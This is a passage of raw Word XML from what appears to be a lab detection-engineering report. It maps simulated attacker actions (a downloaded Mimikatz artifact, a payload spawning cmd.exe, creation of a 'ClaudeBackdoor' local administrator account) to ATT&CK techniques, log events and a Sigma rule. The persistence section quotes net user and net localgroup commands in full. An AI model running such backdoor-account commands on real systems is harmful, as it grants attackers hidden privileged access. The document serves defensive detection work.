          <w:p w14:paraId="6B081D43">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Sysmon Event 1, Task Scheduler Event 106</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2545" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="67CE4D98">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Detect task creation with command-line arguments launching binaries from temporary directories</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="34ED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jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2033" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="462ABFAC">
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rStyle w:val="20"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>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GetClaude.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3056" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3223ECEE">
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rStyle w:val="37"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="37"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>Downloaded Secondary Payload — Mimikatz Artifact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2545" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="64035735">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Sysmon Event 1, File Creation Event 11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2545" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3EC25EEA">
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>Monitor file creation in temporary directories matching known credential-dumper hashes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7ED04786">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="6455410" cy="4187825"/>
            <wp:effectExtent l="0" t="0" r="254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6455410" cy="4187825"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="05222BB9">
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>Figure 3. Process lineage is the primary pivot for reconstructing post-compromise actions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CFB385">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Sigma 01 — Suspicious Payload Child Command Shell (Mapped Phase: Phase 4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Severity:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>High</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425C9B9A">
      <w:pPr>
        <w:pStyle w:val="36"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>This rule detects the execution of cmd.exe when it is launched by a suspicious payload or unusual parent process. In the lab, FreeClude.exe spawned cmd.exe, which was then used for post-compromise commands such as whoami and systeminfo. The rule focuses on the combination of cmd.exe and a suspicious parent process rather than relying on a specific discovery command.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="12"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="108" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="108" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10118"/>
      </w:tblGrid>
      <w:tr w14:paraId="0F4F07B4">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44A8BC39">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>title: Suspicious Payload Child Command Shell</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FAFED78">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>status: test</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E5B4F69">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="46D00A7F">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>logsource:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="009740E0">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category: process_creation</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2191D0C3">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product: windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="617DF533">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4527731F">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>detection:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43EE4C5A">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selection_image:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BB76F2B">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Image|endswith: '\</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>cmd</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>.exe'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D4B8C87">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0A58ED69">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selection_parent:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="047CA6F9">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:ind w:firstLine="439"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">ParentImage|endswith: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4EF256AC">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:ind w:firstLine="800" w:firstLineChars="400"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>- '\FreeClude.exe'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="301D2581">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="65AE2A23">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condition: all of selection_*</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DBF4A17">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="42080307">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>level: high</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="032DD65B">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5425DB6A">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>tags:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54D7C8CE">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 attack.execution</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="752F6157">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:ind w:firstLine="200" w:firstLineChars="100"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">- </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>attack.t1059.003</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6EC3A850">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>09 / PERSISTENCE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CB6569">
      <w:pPr>
        <w:pStyle w:val="40"/>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>Phase 5A — Local Account Creation and Privileged Group Membership</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1675849F">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Persistence becomes visible when the operator creates a new local account and changes its group membership. The observed command sequence shows ClaudeBackdoor being created as a local user and then added to the local Administrators group. This supports T1136.001 — Create Account: Local Account and T1098.007 — Account Manipulation: Additional Local or Domain Groups.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCAEBB5">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The account was later removed with net user ClaudeBackdoor /delete, providing a useful create → privilege → cleanup sequence for SIEM correlation. The account-management events should be correlated with the originating process, user context, and any preceding suspicious payload or remote-shell activity.</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083"/>
        <w:gridCol w:w="2530"/>
        <w:gridCol w:w="2530"/>
      </w:tblGrid>
      <w:tr w14:paraId="1BEC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jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1976" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B1F33"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7A57749D">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Action</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3083" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B1F33"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="544EB235">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ATT&amp;CK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2530" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B1F33"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="107FA28B">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Sysmon evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2530" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B1F33"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="181119B3">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Windows Security evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="006A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1976" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="67CBA77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Create local account</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3083" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1A8D92A9">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T1136.001 — Create Account: Local Account</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2530" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3816D057">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Sysmon Event 1 for </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="20"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>net.exe</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve"> with </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="20"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>net user ClaudeBackdoor ... /add</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2530" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="15F1BC73">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Event ID 4720 — User Account Created</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="69C2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1" w:hRule="atLeast"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1976" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="300C311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Add account to Administrators</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3083" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="300C4110">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T1098.007 — Account Manipulation: Additional Local or Domain Groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2530" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="788A87C2">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Sysmon Event 1 for </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="20"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>net.exe</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve"> with </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="20"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>net localgroup Administrators ClaudeBackdoor /add</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2530" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7536AA40">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Event ID 4732 — Member Added to Local Security-Enabled Local Group</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3364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1976" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7009866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Delete local account</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3083" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="35DEC0C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Supporting cleanup activity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2530" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
